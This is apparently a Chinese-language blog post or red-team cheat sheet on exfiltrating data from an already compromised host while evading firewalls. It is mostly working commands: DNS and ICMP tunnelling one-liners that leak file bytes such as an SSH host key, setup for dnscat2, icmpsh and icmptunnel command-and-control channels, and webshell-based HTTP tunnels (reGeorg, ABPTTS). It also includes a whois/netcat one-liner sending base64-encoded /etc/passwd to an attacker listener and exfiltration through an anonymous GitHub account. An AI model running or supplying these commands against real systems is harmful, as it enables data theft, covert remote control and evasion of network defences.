前言 攻陷目标主机之后并不意味着就不用再和防火墙斗智斗勇,数据回传的过程仍然有可能被防火墙发现和阻止,所以我们要根据实际情况选择更隐秘的方式传出文件。本文总结了常用的数据传出方式,将持续更新。
应用协议 利用http.server回传
1 2 3 4 5 6 python2:python -m SimpleHTTPServerpython3 :python -m http.server php: php -S 0.0 .0.0 :8888
利用ftp回传
1 2 service vsftpd start 访问ip :21
利用smb回传
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 cd /etc/samba vi smb.conf 文件内添加: [share ] path =/home/share available = yes browsealbe = yes public = no writable = yes cd /home mkdir share chmod -R 777 share useradd share smbpasswd -a share service smbd restart 访问\\ip
利用scp回传
1 scp localfilename root@xx.xx .xx .xx :filename
DNS隧道 1.命令行
1 for i in $(xxd -p -c 10 ssh_host_ecdsa_key ) ;do sleep 1 s && nslookup $i.xxx.com xx.xx.xx.xx;done
2.dnscat2、dns2tcp
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 攻击机(server): 安装 apt-get install ruby ruby -dev git make g++ rubygems gem update --system gem install bundler git clone https: //github.com /iagox86/dnscat2.gitcd dnscat2/server bundle install 设置一个NS记录指向自己的子域名,再设置一个A记录指向自己部署server端的服务器地址,运行ruby ./dnscat2.rb dns.uuzdaisuki.com --no -cache 受害者(linux)安装 git clone https: //github.com /iagox86/dnscat2.gitcd dnscat2/client/make 受害者(windows)安装 https: //downloads.skullsecurity.org/dnscat2/ 下载win32.zip的dnascat2后解压 将server中产生的secret复制下来,运行 ./dnscat --dns domain=dns.uuzdaisuki.com --secret=xxxxxxxxxxxxxxxxxxxxx session -i 1
详情参考:
http://uuzdaisuki.com/2018/08/07/%E5%88%A9%E7%94%A8DNS-Tunnel%E4%BC%A0%E8%BE%93%E6%95%B0%E6%8D%AE/
ping隧道 1.命令行
1 cat a.txt | xxd -p -c 1 |xargs -n 1 -I '{}' ping -c 1 -s 56 -p '{}' xx.xx.xx.xx
2.pingtunnel
1 2 3 4 5 6 7 http://www.cs .uit.no /~daniels/PingTunnel/ ptunnel -p 192.168 .100.232 -lp 8888 -da 192.168 .118.131 -dp 3389 -p 指定ICMP隧道另一端的IP -lp :指定本地监听的端口 -da:指定要转发的目标机器的IP -dp :指定要转发的目标机器的端口 -x :指定连接密码
3.icmpsh展开cc通道:
1 2 3 4 5 6 7 8 9 攻击者机器部署icmpsh: git clone https: //github.com /inquisb/icmpsh.git sysctl -w net.ipv4.icmp_echo_ignore_all=1 cd icmpshsyntax : ./icmpsh_m.py <attacker’s-IP> <target-IP> ./icmpsh_m.py 192.168 .1.108 192.168 .1.106 受害者机器:syntax : icmpsh.exe -t <Kali IP> icmpsh.exe -t 192.168 .1.108
4.icmptunnel
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 受害者主机: 安装icmptunnel git clone https://gi thub.com/jamesbarlow/i cmptunnel.git cd icmptunnel make 禁用ICMP echo回复 echo 1 > /proc/ sys/net/i pv4/icmp_echo_ignore_all 服务端模式启动icmptunnel,并且给新的隧道接口分配一个IP地址 ./icmptunnel -s Ctrlz bg/sbin/i fconfig tun0 10.0 .0.1 netmask 255.255 .255.0 ifconfig 攻击者主机: 安装icmptunnel git clone https://gi thub.com/jamesbarlow/i cmptunnel.git cd icmptunnel make 禁用ICMP echo回复 echo 1 > /proc/ sys/net/i pv4/icmp_echo_ignore_all 运行 ./icmptunnel 192.168 .1.108 ctrl z/sbin/i fconfig tun0 10.0 .0.2 netmask 255.255 .255.0
http隧道 1.reGeorg
1 2 3 4 5 6 7 git clone https://gi thub.com/sensepost/ reGeorg.git pip install urllib3 将对应页面上传到目标服务器上 并在本地监听 python reGeorgSocksProxy.py ‐p 8080 ‐l 192.168 .1.5 ‐u 访问目标 http:// 192.168 .1.119 /tunnel.aspx
2.ABPTTS
1 2 3 4 5 6 7 8 9 10 11 安装 apt-get install python -dev build-essential libssl-dev libffi-dev libxml2-dev libxslt1-dev zlib1g-dev python -pip pip install pycrypto git clone https: //github.com /nccgroup/ABPTTS.gitcd ABPTTS/ 生成payloadpython abpttsfactory.py ‐o webshell 传到目标靶机 端口转发python abpttsclient.py ‐c webshell/config.txt ‐u "http://192.168.1.119/abptts.aspx" ‐f 192.168 .1.5 :33389 /192.168 .1.119 :3389 让攻击机的33389 端口流量转发到3389 ,通过HTTPS服务
whois隧道 1 2 3 4 失陷机: root@kali :~# whois -h x .x .x .x -p 4444 `cat /etc/passwd | base64 ` 接受机: root@kali :/tmp# nc -l -v -p 4444 | sed "" s/ //g"" | base64 -d
社交平台或工具 利用腾讯qq、微信等工具回传
代码托管 利用github回传
1 2 3 4 5 6 7 8 9 10 通过一个匿名邮箱注册github账户,并创建一个空仓库 mdkir uploadcd upload git config --global user.name “user.name” git config --global user.email “user.email” git clone https: //github.com /xxx/xxx.gitcp -r file upload git add * git commit -m "update" git push -u origin master
云储存 利用百度网盘等网盘类工具回传
邮件 利用邮件外发回传